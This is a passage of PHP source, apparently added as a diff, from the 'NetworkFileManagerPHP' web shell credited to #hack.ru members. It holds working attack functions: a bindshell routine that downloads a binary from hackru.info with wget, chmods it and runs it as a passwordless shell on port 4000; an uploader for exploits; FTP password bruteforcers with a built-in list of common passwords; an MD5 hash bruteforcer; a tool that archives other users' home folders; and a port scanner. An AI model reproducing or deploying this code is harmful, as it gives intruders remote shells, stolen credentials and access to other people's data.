BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out"; + $subject = "".$subject; + + if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) { + $counter = $counter + 1; + echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>"; + } else { + echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>"; + } + } else { + echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>"; + } + } else { + } + + if(@fclose ($afile)) { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>"; + } else { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>Unable to close <b>\"".$address."\"</b> file!<br></td></tr> </table>"; } + } else { + echo "unable to read file <b>\"".$afile."\"</b> ...<br>"; + } + + $status2 ="Status: ".$counter." messages were sent."; + echo "<br>"; + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>$status2</td></tr> </table>"; + +} +} + + +# help + +function help() { + + global $action,$REMOTE_ADDR,$HTTP_REFERER; + + echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br> + +There were added some commands to NFM, from scripts kind of itself. They are:<br> + +- Using aliases (<b>Rush</b>)<br> + +- FTP bruteforce (<b>TerraByte<b/>)<br> + +- Translated to english by (<b>revers<b/>)<br> + +- Added some sysinfo commands by (<b>revers<b/>)<br> + +- All the rest code belongs to me (<b>xoce<b/>)<br> + +- Thanks for testing goes to all #hack.ru channel<br><br> + +<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br> + +<b>How can you find us:</b><br> + +Irc server: irc.megik.net:6667 /join #hack.ru<br> + +See you round at network!!!<br></td></tr></table><br>"; + +} + + + + + +function exploits($dir) { + + global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp; + +if (!isset($status)) upload_exploits(); + + + +else + +{ + + + +$data = implode("", file($file3)); + +$fp = @fopen($file2, "wb"); + +fputs($fp, $data); + +$ok = fclose($fp); + +if($ok) + +{ + +$size = filesize($file2)/1024; + +$sizef = sprintf("%.2f", $size); + +print "".exec("chmod 777 $public[1]").""; + +print "".exec("chmod 777 $public[2]").""; + +print "".exec("chmod 777 $public[3]").""; + +print "".exec("chmod 777 $private[1]").""; + +print "".exec("chmod 777 $private[2]").""; + +print "".exec("chmod 777 $private[3]").""; + +print "".exec("chmod 777 $private[4]").""; + +print "".exec("chmod 777 $private[5]").""; + +print "".exec("chmod 777 $private[6]").""; + +print "".exec("chmod 777 $private[7]").""; + +print "".exec("chmod 777 $private[8]").""; + + + +print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>"; + +} + +else + +{ + +print "Some errors occured."; + +} + +} + +} + + + + + +# FTP-bruteforce + +function ftp() { + + global $action, $ftp_server, $filename, $HTTP_HOST; + + ignore_user_abort(1); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>"; + + + + $fpip = @fopen ($filename, "r"); + + if ($fpip) { + + while (!feof ($fpip)) { + + $buf = fgets($fpip, 100); + + ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); + + $conn_id=ftp_connect($ftp_server); + + if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) { + + + + $f=@fopen($HTTP_HOST,"a+"); + + fputs($f,"$g[1]:$g[1]\n"); + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>"; + + + + ftp_close($conn_id); + + fclose($f); + + } else { + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>"; + + } + + } + + } + +} + + + +function tar() { + + global $action, $filename; + + set_time_limit(0); + + echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br> + +<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br> + +<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr> + +</table><br>"; + + + +$http_public="/public_html/"; + +$fpip = @fopen ($filename, "r"); + +if ($fpip) { + + while (!feof ($fpip)) { + + $buf = fgets($fpip, 100); + + ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); + + $name=$g[1]; + + echo " + +<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<form method='get' action='$PHP_SELF' > + +<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr> + +<tr> + +<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td> + +<td valign=top><input type=submit value='GO' class=button1 $style_button></td> + +</tr></form></table>"; + + } + + } + +} + + + +# bindshell + +function bash() { + + global $action, $port_bind, $pass_key; + + + +echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr> + +</table><br>"; + + + +echo " + +<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>"; + + + +echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>"; + +echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>"; + +echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>"; + +# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>"; + +echo"</table>"; + + + + } + + + +function crypte() { + + global $action,$md5a,$sha1a,$crc32, $key,$string; + +echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr> + +</table>"; + + + +echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post> + + <tr><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td> + + <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr> + + <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td> + + <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr> + + + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td> + + <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr> + + <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'> + + </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr> + + + + </form></table>"; + +echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> + + &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td> + + <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr> + + <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr> + + + + </form></table>"; + + + + } + + + +function decrypte() { + + global $action,$pass_de,$chars_de,$dat,$date; + +set_time_limit(0); + +ignore_user_abort(1); + + + +echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr> + +</table>"; + + + +if($chars_de==""){$chars_de="";} + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Data decrypter:</b></td></tr> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> + + &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr> + + <tr> + + <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td> + + <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td> + + <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font> + + <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a> + +<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a> + +<a class=menu href=javascript:ins('0123456789')>[0-9]</a> + +<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br> + +<font color=red><b><u>RUS:</u></b></font> + +<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a> + +<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a> + +</td></tr> + +<tr><td align=center width=400> + +<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button> + +</td></tr> + + + + </form></table>"; + + + + + +if($_POST[pass_de]){ + +$pass_de=htmlspecialchars($pass_de); + +$pass_de=stripslashes($pass_de); + +$dat=date("H:i:s"); + +$date=date("d:m:Y"); + + + +crack_md5(); + +} + +} + + + +function crack_md5() { + +global $chars_de; + +$chars=$_POST[chars]; + +set_time_limit(0); + +ignore_user_abort(1); + +$chars_de=str_replace("<",chr(60),$chars_de); + +$chars_de=str_replace(">",chr(62),$chars_de); + +$c=strlen($chars_de); + +for ($next = 0; $next <= 31; $next++) { + +for ($i1 = 0; $i1 <= $c; $i1++) { + +$word[1] = $chars_de{$i1}; + +for ($i2 = 0; $i2 <= $c; $i2++) { + +$word[2] = $chars_de{$i2}; + +if ($next <= 2) { + +result(implode($word)); + +}else { + +for ($i3 = 0; $i3 <= $c; $i3++) { + +$word[3] = $chars_de{$i3}; + +if ($next <= 3) { + +result(implode($word)); + +}else { + +for ($i4 = 0; $i4 <= $c; $i4++) { + +$word[4] = $chars_de{$i4}; + +if ($next <= 4) { + +result(implode($word)); + +}else { + +for ($i5 = 0; $i5 <= $c; $i5++) { + +$word[5] = $chars_de{$i5}; + +if ($next <= 5) { + +result(implode($word)); + +}else { + +for ($i6 = 0; $i6 <= $c; $i6++) { + +$word[6] = $chars_de{$i6}; + +if ($next <= 6) { + +result(implode($word)); + +}else { + +for ($i7 = 0; $i7 <= $c; $i7++) { + +$word[7] = $chars_de{$i7}; + +if ($next <= 7) { + +result(implode($word)); + +}else { + +for ($i8 = 0; $i8 <= $c; $i8++) { + +$word[8] = $chars_de{$i8}; + +if ($next <= 8) { + +result(implode($word)); + +}else { + +for ($i9 = 0; $i9 <= $c; $i9++) { + +$word[9] = $chars_de{$i9}; + +if ($next <= 9) { + +result(implode($word)); + +}else { + +for ($i10 = 0; $i10 <= $c; $i10++) { + +$word[10] = $chars_de{$i10}; + +if ($next <= 10) { + +result(implode($word)); + +}else { + +for ($i11 = 0; $i11 <= $c; $i11++) { + +$word[11] = $chars_de{$i11}; + +if ($next <= 11) { + +result(implode($word)); + +}else { + +for ($i12 = 0; $i12 <= $c; $i12++) { + +$word[12] = $chars_de{$i12}; + +if ($next <= 12) { + +result(implode($word)); + +}else { + +for ($i13 = 0; $i13 <= $c; $i13++) { + +$word[13] = $chars_de{$i13}; + +if ($next <= 13) { + +result(implode($word)); + +}else { + +for ($i14 = 0; $i14 <= $c; $i14++) { + +$word[14] = $chars_de{$i14}; + +if ($next <= 14) { + +result(implode($word)); + +}else { + +for ($i15 = 0; $i15 <= $c; $i15++) { + +$word[15] = $chars_de{$i15}; + +if ($next <= 15) { + +result(implode($word)); + +}else { + +for ($i16 = 0; $i16 <= $c; $i16++) { + +$word[16] = $chars_de{$i16}; + +if ($next <= 16) { + +result(implode($word)); + +}else { + +for ($i17 = 0; $i17 <= $c; $i17++) { + +$word[17] = $chars_de{$i17}; + +if ($next <= 17) { + +result(implode($word)); + +}else { + +for ($i18 = 0; $i18 <= $c; $i18++) { + +$word[18] = $chars_de{$i18}; + +if ($next <= 18) { + +result(implode($word)); + +}else { + +for ($i19 = 0; $i19 <= $c; $i19++) { + +$word[19] = $chars_de{$i19}; + +if ($next <= 19) { + +result(implode($word)); + +}else { + +for ($i20 = 0; $i20 <= $c; $i20++) { + +$word[20] = $chars_de{$i20}; + +if ($next <= 20) { + +result(implode($word)); + +}else { + +for ($i21 = 0; $i21 <= $c; $i21++) { + +$word[21] = $chars_de{$i21}; + +if ($next <= 21) { + +result(implode($word)); + +}else { + +for ($i22 = 0; $i22 <= $c; $i22++) { + +$word[22] = $chars_de{$i22}; + +if ($next <= 22) { + +result(implode($word)); + +}else { + +for ($i23 = 0; $i23 <= $c; $i23++) { + +$word[23] = $chars_de{$i23}; + +if ($next <= 23) { + +result(implode($word)); + +}else { + +for ($i24 = 0; $i24 <= $c; $i24++) { + +$word[24] = $chars_de{$i24}; + +if ($next <= 24) { + +result(implode($word)); + +}else { + +for ($i25 = 0; $i25 <= $c; $i25++) { + +$word[25] = $chars_de{$i25}; + +if ($next <= 25) { + +result(implode($word)); + +}else { + +for ($i26 = 0; $i26 <= $c; $i26++) { + +$word[26] = $chars_de{$i26}; + +if ($next <= 26) { + +result(implode($word)); + +}else { + +for ($i27 = 0; $i27 <= $c; $i27++) { + +$word[27] = $chars_de{$i27}; + +if ($next <= 27) { + +result(implode($word)); + +}else { + +for ($i28 = 0; $i28 <= $c; $i28++) { + +$word[28] = $chars_de{$i28}; + +if ($next <= 28) { + +result(implode($word)); + +}else { + +for ($i29 = 0; $i29 <= $c; $i29++) { + +$word[29] = $chars_de{$i29}; + +if ($next <= 29) { + +result(implode($word)); + +}else { + +for ($i30 = 0; $i30 <= $c; $i30++) { + +$word[30] = $chars_de{$i30}; + +if ($next <= 30) { + +result(implode($word)); + +}else { + +for ($i31 = 0; $i31 <= $c; $i31++) { + +$word[31] = $chars_de{$i31}; + +if ($next <= 31) { + +result(implode($word)); + + + +}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} + + + +function result($word) { + +global $dat,$date; + +$pass_de=$_POST[pass_de]; + +$dat2=date("H:i:s"); + +$date2=date("d:m:Y"); + + + +if(md5($word)==$pass_de){ + +print " + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr> + + <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr> + + <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr> + + <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr> + + <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file: <b>".$word."_md5</b></td></tr> + +</table> + + "; + + $f=@fopen($word._md5,"a+"); + + fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n "); + + exit;} + + + + + + + +} + + + +function brut_ftp() { + + global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka; + +set_time_limit(0); + +ignore_user_abort(1); + +echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr> +<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr> + +</table>"; + + + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Brut FTP:</b></td></tr> + + <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500> + + &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='host' size=50></td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='login' size=50></td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='chislo' size=10></td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td> + +<td align=left width=350>&nbsp;&nbsp;&nbsp; + +<input class='inputbox' type='text' name='proverka' size=50></td></tr> + +<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button> + +</td></tr> + + + + </form></table>"; + + + + + +function s() { + + $word="qwrtypsdfghjklzxcvbnm"; + + return $word[mt_rand(0,strlen($word)-1)]; + +} + + + +function g() { + + $word="euioam"; + + return $word[mt_rand(0,strlen($word)-2)]; + +} + + + +function name0() { return s().g().s(); } + +function name1() { return s().g().s().g(); } + +function name2() { return s().g().g().s(); } + +function name3() { return s().s().g().s().g(); } + +function name4() { return g().s().g().s().g(); } + +function name5() { return g().g().s().g().s(); } + +function name6() { return g().s().s().g().s(); } + +function name7() { return s().g().g().s().g(); } + +function name8() { return s().g().s().g().g(); } + +function name9() { return s().g().s().g().s().g(); } + +function name10() { return s().g().s().s().g().s().s(); } + +function name11() { return s().g().s().s().g().s().s().g(); } + + + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); + +$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); + + + +function randword() { + + global $cool; + + $func="name".mt_rand(0,11); + + $func2="name".mt_rand(0,11); + + switch (mt_rand(0,11)) { + + case 0: return $func().mt_rand(5,99); + + case 1: return $func()."-".$func2(); + + case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; + + case 3: return $func()."!".$func(); + + case 4: return randpass(mt_rand(5,12)); + + default: return $func(); + + } + + + + + +} + + + +function randpass($len) { + + $word="qwertyuiopasdfghjklzxcvbnm1234567890"; + + $s=""; + + for ($i=0; $i<$len; $i++) { + + $s.=$word[mt_rand(0,strlen($word)-1)]; + + } + + return $s; + +} + +if (@unlink("pass.txt") < 0){ + +echo "nothing"; + +exit; + +} + +$file="pass.txt"; + +if($file && $host && $login){ + + $cn=mt_rand(30,30); + +for ($i=0; $i<$cn; $i++) { + + $s=$cool2[$i]; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$s\n"); + + } + + + + $cnt2=mt_rand(43,43); + +for ($i=0; $i<$cnt2; $i++) { + + $r=$cool[$i]; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$login$r\n"); + +} + +$p="$proverka"; + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$p\n"); + + + + $cnt3=mt_rand($chislo,$chislo); + + for ($i=0; $i<$cnt3; $i++) { + + $u=randword(); + + $f=@fopen(pass.".txt","a+"); + + fputs($f,"$u\n"); + + } + + + + if(is_file($file)){ + + $passwd=file($file,1000); + + for($i=0; $i<count($passwd); $i++){ + + $stop=false; + + $password=trim($passwd[$i]); + + $open_ftp=@fsockopen($host,21); + + if($open_ftp!=false){ + + fputs($open_ftp,"user $login\n"); + + fputs($open_ftp,"pass $password\n"); + + while(!feof($open_ftp) && $stop!=true){ + + $text=fgets($open_ftp,4096); + + if(preg_match("/230/",$text)){ + + $stop=true; + + $f=@fopen($host._ftp,"a+"); + + fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n "); + + + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br> + +&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table> + +";exit; + + } + + elseif(preg_match("/530/",$text)){ + + $stop=true; + + + + } + + } + + fclose($open_ftp); + + }else{ + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr> + +</table> + +";exit; + + } + + } + + } + +} + + + +} + + + +# port scanner + +function portscan() { + + global $action,$portscan,$port,$HTTP_HOST,$min,$max; + + + + $mtime = explode(" ",microtime()); + + $mtime = $mtime[1] + $mtime[0]; + + $time1 = $mtime; + + + + $id = $HTTP_HOST; + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>"; + + + + $lport = $min; + + $hport = $max; + + $op = 0; + + $gp = 0; + + + + for ($porta=$lport; $porta<=$hport; $porta++) { + + $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4); + + if ( !$fp ) { $gp++; } + + else { + + $port_addres = $port[$porta]; + + if($port_addres == "") $port_addres = "unknown"; + + $serv = getservbyport($porta, TCP); + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>"; + + $op++; + + } + + } + + + + if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>"; + + + + $unsi = ($op/$porta)*100; + + $unsi = round($unsi); + + + + echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>"; + + echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>"; + + echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>"; + + echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>"; + + + + $mtime = explode(" ",microtime()); + + $mtime = $mtime[1] + $mtime[0]; + + $time2 = $mtime; + + $loadtime = ($time2 - $time1); + + $loadtime = round($loadtime, 2); + + + + echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>"; + +} + + + +function nfm_copyright() { + +global $action,$upass,$uname,$nfm; + + return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center 